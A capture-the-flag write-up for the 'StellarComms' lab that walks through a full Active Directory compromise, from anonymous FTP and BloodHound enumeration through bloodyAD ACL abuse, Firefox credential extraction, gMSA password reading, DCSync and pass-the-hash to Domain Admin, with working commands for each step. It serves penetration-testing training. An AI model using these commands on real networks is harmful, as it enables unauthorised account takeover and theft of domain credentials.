> For the complete documentation index, see [llms.txt](https://abdulazim.gitbook.io/write-up/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://abdulazim.gitbook.io/write-up/hacksmarter-write-up/stellarcomms.md).

# StellarComms

Medium Rate

#### Objective and Scope

Stellar Communications, a regional telecommunications provider, has retained the Hack Smarter Red Team to conduct a covert internal network penetration test. The client is concerned about the resilience of their internal Active Directory infrastructure against insider threats and compromised VPN endpoints.

Your objective is to simulate a compromised remote worker, pivot through the internal network, and demonstrate the ability to compromise high-value targets (HVTs) without triggering the Blue Team's SOC alerts.

#### Initial Access

Our initial access team has successfully established a VPN tunnel into the environment. We have identified a valid username, likely belonging to a new hire or junior staff member.

* **Valid User:**
  * **Username:** `junior.analyst`
  * **Password:** *Unknown*

#### Summary

> The attack begins by simulating a remote employee with VPN access and knowledge of a valid domain username, **junior.analyst**, within the StellarComms environment. During enumeration of the domain controller **DC-STELLAR**, an exposed FTP service is discovered containing onboarding documents that reveal default account credentials. Using these credentials, we authenticate as **junior.analyst** and perform Active Directory enumeration with BloodHound. This identifies a misconfigured ACL that grants the **WriteOwner** permission over the **stellar-ops\_control** group.
>
> By abusing this permission, we take ownership of the group, gain full control over it, and reset the password of the **ops.controller** account, allowing remote access through WinRM. From this foothold, Firefox credentials are extracted from the local user profile, revealing the password for **astro.researcher**.
>
> Using the **astro.researcher** account, we exploit a **WriteDACL** permission over the **eng.payload** account to reset its password. Access to **eng.payload** enables us to retrieve the managed password of the **satlink-service$** gMSA account. Because this account possesses **DCSync** privileges, we replicate Active Directory credentials and obtain the NTLM hash of the **Administrator** account. Finally, using Pass-the-Hash over WinRM, we authenticate as the Domain Administrator and retrieve the final flag.

***

#### Reconnaissance (Nmap Scan)

```shellscript
# Nmap 7.99 scan initiated Sat Jun 20 09:40:40 2026 as: /usr/lib/nmap/nmap -A -vv -T4 -oN nmap.txt 10.0.21.116
Increasing send delay for 10.0.21.116 from 0 to 5 due to 347 out of 867 dropped probes since last increase.
Increasing send delay for 10.0.21.116 from 5 to 10 due to 11 out of 12 dropped probes since last increase.
Nmap scan report for 10.0.21.116
Host is up, received timestamp-reply ttl 126 (0.25s latency).
Scanned at 2026-06-20 09:40:41 EDT for 89s
Not shown: 984 closed tcp ports (reset)
PORT     STATE SERVICE       REASON          VERSION
21/tcp   open  ftp           syn-ack ttl 126 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 09-12-25  12:29PM       <DIR>          Docs
| 09-10-25  12:15PM       <DIR>          IT
|_09-10-25  12:44PM       <DIR>          Pics
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        syn-ack ttl 126 Simple DNS Plus
80/tcp   open  http          syn-ack ttl 126 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-06-20 13:40:58Z)
135/tcp  open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: stellarcomms.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 126
464/tcp  open  kpasswd5?     syn-ack ttl 126
593/tcp  open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 126
3268/tcp open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: stellarcomms.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 126
3389/tcp open  ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC-STELLAR.stellarcomms.local
| Issuer: commonName=DC-STELLAR.stellarcomms.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-06-19T13:34:31
| Not valid after:  2026-12-19T13:34:31
| MD5:     6a49 0db7 f9a6 fe98 32c2 a2e5 9f82 228b
| SHA-1:   95b7 ae64 7147 a516 0a91 c5de a7a2 8b09 1157 a505
| SHA-256: c5b2 6161 3f99 c8cb 2784 6727 0372 d8b2 f510 5911 85d8 dc92 b85e 9772 7d56 fcb7
| -----BEGIN CERTIFICATE-----
| MIIC/jCCAeagAwIBAgIQTrg8q05w74xIj3TrFD7VaTANBgkqhkiG9w0BAQsFADAo
| MSYwJAYDVQQDEx1EQy1TVEVMTEFSLnN0ZWxsYXJjb21tcy5sb2NhbDAeFw0yNjA2
| MTkxMzM0MzFaFw0yNjEyMTkxMzM0MzFaMCgxJjAkBgNVBAMTHURDLVNURUxMQVIu
| c3RlbGxhcmNvbW1zLmxvY2FsMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
| AQEAvc42uXHEDNPjT/VyMgoV8Xrx8ph1UEmuv72XQJDgfxAsqlFZ2IpfmVfs28Jk
| WHtIHT/0Vprh0B9bFDA8g/zYac5dBNw+l7jSPCCO8olk8Lgr3l2uxorZmk7vccEH
| US44kDiixhWgQM/WxGMAvbGbNKDtdyan9v9pTObc3QOd0bPppw0MnCosZ0t4oeMr
| LJNMKJohBo/YZ9Y+muxSRaCv86okBGSl2Sk8bhKFEtQ977NbCYy+Qgpf9va/BcWv
| sA7Mk6jwS28+InkgPsdAdeTr03/nhZV+rswUlsLYEoIu8TJODmBoYm/IdojRkAJG
| K0PlnhbmvId8gNzr+vdIaP68bQIDAQABoyQwIjATBgNVHSUEDDAKBggrBgEFBQcD
| ATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBAF1hMga5GwfJVxr6eyX8
| prUn45csWOnpLUUJ5AJznAq1fn1GV30v7BHiUef9zQQxz1vejkbosYbXK+7rRFlu
| pCrjXZ8r9sLxGQrdJIdof5uixBP/WvhEJPDxthjERgIIixPoBNtE2FK54Ik85aqq
| f7rj1ol3K2kRbWy7MV2TRyuSznnIGSPuGAjkn1bBVc1GJO1wHgMAJxjfMwTdD3CZ
| /Ue2c4E+yn9MID67lOHZP+c6avHZtUx1IoslgBiG423KgWEv13ceo7ubtM9sQ1t6
| vokfxzx8MdNWaA05dr+6Gzqk9pHKHAxaazRr+HL08lQG0eJDQ/ydasirK2gD7T6F
| ZyU=
|_-----END CERTIFICATE-----
|_ssl-date: 2026-06-20T13:41:55+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: STELLARCOMMS
|   NetBIOS_Domain_Name: STELLARCOMMS
|   NetBIOS_Computer_Name: DC-STELLAR
|   DNS_Domain_Name: stellarcomms.local
|   DNS_Computer_Name: DC-STELLAR.stellarcomms.local
|   Product_Version: 10.0.17763
|_  System_Time: 2026-06-20T13:41:37+00:00
5357/tcp open  http          syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
5985/tcp open  http          syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.99%E=4%D=6/20%OT=21%CT=1%CU=36546%PV=Y%DS=3%DC=T%G=Y%TM=6A3698B
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=107%TI=I%CI=I%TS=U)SEQ(SP=1
OS:01%GCD=1%ISR=109%TI=I%CI=I%TS=U)SEQ(SP=104%GCD=1%ISR=10A%TI=I%CI=I%TS=U)
OS:SEQ(SP=107%GCD=1%ISR=108%TI=I%CI=I%TS=U)SEQ(SP=FD%GCD=1%ISR=103%TI=I%CI=
OS:I%TS=U)OPS(O1=M510NW8NNS%O2=M510NW8NNS%O3=M510NW8%O4=M510NW8NNS%O5=M510N
OS:W8NNS%O6=M510NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN
OS:(R=Y%DF=Y%T=80%W=FFFF%O=M510NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F
OS:=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%
OS:RUCK=G%RUD=G)IE(R=N)

Network Distance: 3 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC-STELLAR; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-06-20T13:41:35
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 45192/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 17179/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 19524/udp): CLEAN (Timeout)
|   Check 4 (port 9844/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   261.64 ms 10.200.0.1
2   ...
3   261.77 ms 10.0.21.116

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 20 09:42:10 2026 -- 1 IP address (1 host up) scanned in 89.72 seconds

```

Above shows nmap result scan. The result shows that the network have a few interesting ports which is ftp, ldap that tied with Active Directory Services, smb, dns, IIS Server 10.0 web server. This is indicating StellarComms machine is a  a fully integrated Windows AD environment where LDAP/LDAPS and Kerberos provide authentication, and SMB and RPC enable remote management, and RDP/WinRM serve as remote access points.

#### FTP

We start first with anonymous login for FTP port.&#x20;

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FyG2xFJg5fhqOIISmNmoG%2Fftp%20enumeration.png?alt=media&amp;token=23d870bb-e3c2-4a62-8de5-ec1fde7ddd7a" alt=""><figcaption></figcaption></figure>

Found 3 directory inside ftp server.

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2Frw1sG0yP3VUKUJBQC2Rb%2Fget%20all%20find%20inside%20ftp%20server.png?alt=media&amp;token=bd40763c-f90d-46d4-b6d9-10da6dc92768" alt=""><figcaption></figcaption></figure>

Get all the document by using command **mget \***. This command will download all the file in the ftp server.

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FiEXKY3uZdCdDkGfPNOjp%2Fimage.png?alt=media&amp;token=51c9896e-6fbe-40ae-a3c0-8793fc5c2382" alt=""><figcaption></figcaption></figure>

After go through a few files, found default password saved in file Stellar\_UserGuide.pdf. So right now we have a complete credentials which is&#x20;

`junior.analyst:Galaxy123!`&#x20;

#### Web

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FGJhGz5ulOWKvbHdRK2DY%2Fimage.png?alt=media&amp;token=28392e2a-8a6b-4779-9b93-b3628b1a0291" alt=""><figcaption></figcaption></figure>

As for web that hosted on port 80. There is nothing interesting since it is only static web site.

#### SMB

With the credentials that we have earlier, we can try to enumerate smb port using nxc tool.

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2F1Vf7soPfTd79IDlx1Kwk%2Ffound%20valid%20password.png?alt=media&amp;token=b7441283-4933-4300-a2e7-e8c9ce336927" alt=""><figcaption></figcaption></figure>

Test authentication on SMB using the credentials. Seems like we have a valid credential.

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FYlrbksjdOIldOiWUvtCz%2Fenumerate%20shares%20file.png?alt=media&amp;token=4c5d7ed6-f060-4324-96d8-7475263eb302" alt=""><figcaption></figcaption></figure>

Looks like nothing interesting insides shares folder.&#x20;

#### BloodHound Enumeration

Seem we didnt have much option to do. Can try BloodHound enumeration to find path to the Domain Admin.

Enumerate the AD using BloodHound

```
bloodhound-ce.py --zip -c All -d stellarcomms.local -u 'junior.analyst' -p 'REDACTED' -dc DC-STELLAR.stellarcomms.local -ns 10.0.21.116
```

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FI16IBlMUxmG9gr2TNvOV%2Fidentified%20the%20Domain%20Admin.png?alt=media&amp;token=292d9987-a4d6-4463-9d91-80c685833aa8" alt=""><figcaption></figcaption></figure>

We identified the Domain Admin.

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2F8yA1X0O3V2abVJYeOvB8%2Fas%20we%20can%20see%20junior.analyst%20have%20WriteOwner%20permission%20to%20the%20stellar-ops_control.png?alt=media&amp;token=5772136b-156e-4a1e-88cc-d6e242b68b24" alt=""><figcaption></figcaption></figure>

As we can see the junior.analyst has WriteOwner permission to the stellarops-control group. This would allow us to set us as owner group then set the GenericALL to the group. so that we can add ourselves as the user junior.analyst and gain the permission of the group and move laterally. but let see what the group can do.

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FE0WE5XYvd1L2sypYnTPg%2Fcan%20move%20litterally%20via%20our%20WriteOwner%20over%20stellar-ops%20control.png?alt=media&amp;token=fff44bd4-9384-401e-b578-f3557b5d8193" alt=""><figcaption></figcaption></figure>

We query from the Shortest Path to Domain Admins. As we can see we can move laterally via Write Owner permissions to the StellarOps-Control group. After move to the StellarOps-Control we can change the pasword of the OPS.Controller via ForceChangePassword permission. We can gain initial foothold since the user is member group of Remote Management Users.

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FHBoNzkHxXPuOOOKM5smr%2Fshortest%20path%20to%20domain%20admins.png?alt=media&amp;token=6175aeb9-24c3-4789-baab-2cf2de2193a1" alt=""><figcaption></figcaption></figure>

We query Shortest Path to the Domain Admin. As we can see, the shortest path to the Domain Admin is  from Astro.Researcher. Unfortunately, no shortest path to the domain admin from Junior.Analyst. So from Astro.Researcher we can laterally move via WriteDacl permissions to Eng.Payload group allow as to read gMSA Password of SATLINK-SERVICES, which has DC Sync privilleges, which allow us to simulate the replication process from the domain controller. This leads to the compromise of the credential material on the domain controller.&#x20;

#### Shell as ops.controller

First we pursue our enumerated attack path from our BloodHound enumeration and escalate from junior.analyst to ops.controller to gain initial foothold on the domain controller.

From previous analyst on the BloodHound graph, we can add junior.analyst to the stellar-ops\_control group.

#### WriteOwner -> change junior.analyst to owner.

We will change the ownership of the target Active Directory object stellarops-control to our controlled account junior.analyst so we gain full controll over. Can refer below.

{% embed url="<https://www.thehacker.recipes/ad/movement/dacl/grant-ownership#grant-ownership>" %}

```shellscript
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set owner $TargetObject $ControlledPrincipal
```

```shellscript
bloodyAD --host DC-STELLAR.stellarcomms.local -d stellarcomms.local -u 'junior.analyst' -p 'REDACTED' set owner 'stellarops-control' 'junior.analyst'
```

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FNHcp7VfGbko7GtzTuhZI%2Fsucessfuly%20change%20junior%20analyst%20to%20owner.png?alt=media&amp;token=a597a7e5-641c-4378-b6d1-db2c23b1aba7" alt=""><figcaption></figcaption></figure>

#### Grant us GenericAll over the Group

{% embed url="<https://www.thehacker.recipes/ad/movement/dacl/grant-rights>" %}

```shellscript
# Give full control (with inheritance to the child object if applicable)
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add genericAll "$TargetObject" "$ControlledPrincipal"
```

```shellscript
bloodyAD --host DC-STELLAR.stellarcomms.local -d stellarcomms.local -u 'junior.analyst' -p 'REDACTED' add genericAll 'stellarops-control' "junior.analyst"
```

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2Fssl11unxUHyyCVlvBBRJ%2Fgrant%20genericALL%20over%20the%20group.png?alt=media&amp;token=6abad3c4-d1dd-46c1-aa72-5458a928ed6a" alt=""><figcaption></figcaption></figure>

#### AddMember: Add junior.analyst to the group

We add the account junior.analyst as a member of the stellarops-control group to inherit its privileges.

This attack is possible when a controlled object has **GenericAll**, **GenericWrite**, **Self**, **AllExtendedRights**, or **Self-Membership** permissions on the target group, allowing the attacker to abuse those permissions.

{% embed url="<https://www.thehacker.recipes/ad/movement/dacl/addmember>" %}

```shellscript
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember "$TargetGroup" "$TargetUser"
```

```shellscript
bloodyAD --host DC-STELLAR.stellarcomms.local -d stellarcomms.local -u 'junior.analyst' -p 'REDACTED' add groupMember 'stellarops-control' 'junior.analyst'
```

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FJdLEdl7cSVMUCS6bRF3g%2Fadd%20junior%20analyst%20as%20group%20member%20of%20stellarops-control.png?alt=media&amp;token=730ae5e4-243b-408e-8896-aa6a7173fd75" alt=""><figcaption></figcaption></figure>

#### ForceChangePassword

We reset the password of the ops.controller account to a known value, allowing us to authenticate as that user.

<https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword#forcechangepassword>

```shellscript
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password "$TargetUser" "$NewPassword"
```

```shellscript
bloodyAD --host DC-STELLAR.stellarcomms.local -d stellarcomms.local -u 'junior.analyst' -p 'REDACTED' set password 'ops.controller' 'Pwned@123'
```

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FCpQxTprLGyUuYzyIdtPy%2Fchange%20password%20of%20ops%20controller.png?alt=media&amp;token=3a3ab6e6-2bcd-49b1-aaa9-22ab9a647544" alt=""><figcaption></figcaption></figure>

We test the credentials using NetExec and are able to authenticate against SMB on DC-Stellar

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2F6eONdQlu0gASMM9qp5It%2Ftest%20authetincation%20eng.payload.png?alt=media&amp;token=8da528a1-e974-401f-bfff-96945573f3fb" alt=""><figcaption></figcaption></figure>

Next, we can get an access using evil-winrm and are able to connect. We find the user flag at `C:\Users\ops.controller\Desktop\user.txt`&#x20;

```shellscript
evil-winrm -i DC-STELLAR.stellarcomms.local -u 'ops.controller' -p 'Pwned@123'
```

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FJHp2UJ5eYbhCDumLmQGH%2Fconnecting%20using%20evil%20winrm.png?alt=media&amp;token=fe69e817-04d0-43ee-bd3a-9f51a3514fe3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FkzZlOkqWnWxw1uQRHOFv%2Fgot%20user%20flag.png?alt=media&amp;token=6ca8d01c-518c-43ba-a6d9-4ae42559cd93" alt=""><figcaption></figcaption></figure>

#### Access as astro.researcher

On the Desktop of ops.controller we find an firefox installer esr. What we can do now is we can try to extract browser credential.&#x20;

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2Ff5rLIVeV5lyamAfY5yuh%2Fimage.png?alt=media&amp;token=ec438331-c054-473d-9828-ed18971928dd" alt=""><figcaption></figcaption></figure>

After do research on this article:

{% embed url="<https://apr4h.github.io/2019-12-20-Harvesting-Browser-Credentials/>" %}

Where are the creds stored?

> Users’ Firefox profiles are each stored in their own directory under `C:\Users\Apr4h\Roaming\Mozilla\Firefox\Profiles\<random text>.default\`. In recent versions of Firefox, there are two relevant artefacts required for decryption of stored credentials.
>
> * `C:\Users\Apr4h\Roaming\Mozilla\Firefox\Profiles\<random text>.default\key4.db`
> * `C:\Users\Apr4h\Roaming\Mozilla\Firefox\Profiles\<random text>.default\logins.json`

Found these 2 profiles.

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FkOb4mtU1InIFsMxYHaY0%2F2%20profiles%20found%20in%20Mozilla.png?alt=media&amp;token=3f35e4e7-02c0-4a96-9d60-b0be07cb7d1a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2F4U5EVJCfPO9uCGmx06YY%2Fdownload%20whole%20profile%20because%20tools%20to%20decrypt%20require%20whole%20profile%20folder.png?alt=media&amp;token=981a0cd2-eb09-4726-9af1-05e9ebd73f42" alt=""><figcaption></figcaption></figure>

Download all the browser profiles

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FemORd7LoDuw85RQHQM2s%2Fdecrypting%20creds%20saved%20inside%20firefox.png?alt=media&amp;token=73b355ee-aae2-41a1-b3b9-580e2371a102" alt=""><figcaption></figcaption></figure>

Decrypting the credentials.

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2Fum1gGLFsV2KQ87JohTPB%2Ftest%20astro%20credential.png?alt=media&amp;token=cc852c51-79a3-4651-98b6-564726a780ad" alt=""><figcaption></figcaption></figure>

We test the credentials using NetExec and are able to authenticate against SMB on DC-Stellar.

```shellscript
nxc smb DC-STELLAR.stellarcomms.local -u 'astro.researcher' -p 'REDACTED' --shares
```

So based on our BloodHound Enumeration we can get to Domain Admin.&#x20;

### Access as eng.payload

#### Grant us GenericAll over the eng.payload

We grant the account astro.researcher GenerilAll permissions over the eng.payload user, giving us full control to modify it as needed.

{% embed url="<https://www.thehacker.recipes/ad/movement/dacl/grant-rights>" %}

```shellscript
# Give full control (with inheritance to the child object if applicable)
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add genericAll "$TargetObject" "$ControlledPrincipal"
```

```shellscript
bloodyAD --host DC-STELLAR.stellarcomms.local -d stellarcomms.local -u 'astro.researcher' -p 'REDACTED' add genericAll 'eng.payload' 'astro.researcher'
```

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FsJT4cEga91LHJRHunRqG%2Fgive%20astro%20grant%20access.png?alt=media&amp;token=451aba91-cb52-4741-a251-e99166ebfdc0" alt=""><figcaption></figcaption></figure>

#### ForceChangePassword

Now we reset the password of the eng.payload, since we have GenericAll permissions over that.

{% embed url="<https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword#forcechangepassword>" %}

```shellscript
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password "$TargetUser" "$NewPassword"
```

```shellscript
bloodyAD --host DC-STELLAR.stellarcomms.local -d stellarcomms.local -u 'astro.researcher' -p 'REDACTED' set password 'eng.payload' 'Pwned123!'
```

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FEJAqMd9sEXUUMa6d56cB%2Fchange%20password%20for%20eng.payload.png?alt=media&amp;token=f4242a58-51a0-46ca-a30b-12c80c2336bd" alt=""><figcaption></figcaption></figure>

Test the credentials using NetExec and are able to authenticate against SMB on DC-STELLAR

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FKSv5Fw7CWleLrgXvE6zh%2Ftest%20authetincation%20eng.payload.png?alt=media&amp;token=47e6fc80-70b6-4a53-9448-3cf7887b8deb" alt=""><figcaption></figcaption></figure>

### Access as satlink-services

#### ReadGMSAPassword

Using the **eng.payload** account, we queried the **msDS-ManagedPassword** attribute to retrieve the managed password of the **satlink-service$** gMSA account.

{% embed url="<https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword#readgmsapassword>" %}

```shellscript
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get object $TargetObject --attr msDS-ManagedPassword
```

We retrive the NT hash of satlink-services$

```shellscript
bloodyAD --host DC-STELLAR.stellarcomms.local -d stellarcomms.local -u 'eng.payload' -p 'Pwned123' get object 'satlink-service$' --attr msDS-ManagedPassword
```

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2FHXS9ADrVPXoeOhuazpno%2Fretrieve%20NT%20hash.png?alt=media&amp;token=d23a4055-ccfa-4a60-b28c-cba075d5bae6" alt=""><figcaption></figcaption></figure>

We test the hash using NetExec and are able to authenticate against SMB on DC-STELLAR

```shellscript
nxc smb DC-STELLAR.stellarcomms.local -u 'satlink-service$' -H 'REDACTED' --shares
```

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2F5sNv9nxOdrASWALJSBdg%2Ftesting%20satlink%20authentication%20using%20the%20dumped%20hash.png?alt=media&amp;token=0e0f2eaf-7229-4b87-981c-eadbc99d9f86" alt=""><figcaption></figcaption></figure>

### Shell as Domain Administrator

With access to the **satlink-service$** account, we are able to perform a DCSync attack to replicate Active Directory credentials.

{% embed url="<https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync#dcsync>" %}

```shellscript
# with Pass-the-Hash
secretsdump -outputfile 'dcsync' -hashes :"$NT_HASH" -dc-ip "$DC_IP" "$DOMAIN"/"$USER"@"$DC_HOST"
```

We execute **secretsdump** to perform the DCSync operation, successfully retrieving the NTLM hashes of domain accounts, including the **Domain Administrator** account.

```shellscript
secretsdump -outputfile 'dcsync' -hashes :'REDACTED' -dc-ip DC-STELLAR.stellarcomms.local 'stellarcomms.local/satlink-service$@DC-STELLAR.stellarcomms.local'
```

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2F7aPjabfpw6EHlax7vr8a%2Fdump%20the%20domain%20admin%20hash.png?alt=media&amp;token=b0b6e28e-8d68-4641-9ad4-79a9ea611939" alt=""><figcaption></figcaption></figure>

Using the retrieved NTLM hash, we authenticate as the **Domain Administrator** via **Evil-WinRM** using a Pass-the-Hash attack. After obtaining administrative access, we locate the final flag in **`C:\Users\Administrator\Desktop\root.txt`**.

```shellscript
evil-winrm -i DC-STELLAR.stellarcomms.local -u 'Administrator' -H 'REDACTED'
```

<figure><img src="https://2918211013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJAG015FJfI6GuIB6PzJ6%2Fuploads%2Fb481vQykc5EFOCezeh2O%2Fusing%20evil%20winrm%20to%20login%20into%20domain%20admin.%20get%20flag.png?alt=media&amp;token=28f6b819-e94f-458b-8baa-506d791544ae" alt=""><figcaption></figcaption></figure>
